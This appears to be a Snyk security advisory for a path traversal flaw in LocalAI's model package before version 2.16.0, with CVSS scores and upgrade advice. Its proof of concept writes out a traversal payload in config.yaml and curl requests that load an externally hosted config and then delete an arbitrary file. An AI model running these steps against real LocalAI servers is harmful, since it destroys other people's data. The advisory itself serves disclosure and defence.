Path Traversal Affecting github.com/go-skynet/localai/pkg/model package, versions <2.16.0


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.05% (20th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMGOSKYNETLOCALAIPKGMODEL-7315130
  • published 25 Jun 2024
  • disclosed 20 Jun 2024
  • credit mvlttt

How to fix?

Upgrade github.com/go-skynet/LocalAI/pkg/model to version 2.16.0 or higher.

Overview

Affected versions of this package are vulnerable to Path Traversal through the model parameter during the model deletion process. An attacker can delete arbitrary files by crafting a request with a manipulated model parameter.

PoC

Create a file named deleteme.txt in the /tmp folder.

Save the following code as config.yaml:

name: "delete_test"
parameters:
  model: ../../../../../../../../tmp/deleteme.txt

usage: | foo

Start a python http server:

python3 -m http.server

Add a model.

curl http://localhost:8080/models/apply -X POST -H "Content-Type: application/json" -d '{"config_url":"<exploit_server>/config.yaml","id":""}'

The model name is the md5 hash of config_url, use this command to calculate this value:

echo -n "<exploit_server>/config.yaml" | md5sum

Delete model:

curl http://localhost:8080/models/delete/f26ecc271c5e79202b71619382c0c22b -X POST

When the process is completed, you will see that the file has been deleted.

References

CVSS Scores

version 4.0
version 3.1
Expand this section

Snyk

Recommended
8.7 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Attack Requirements (AT)
    None
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Confidentiality (VC)
    High
  • Integrity (VI)
    None
  • Availability (VA)
    None
  • Confidentiality (SC)
    None
  • Integrity (SI)
    None
  • Availability (SA)
    None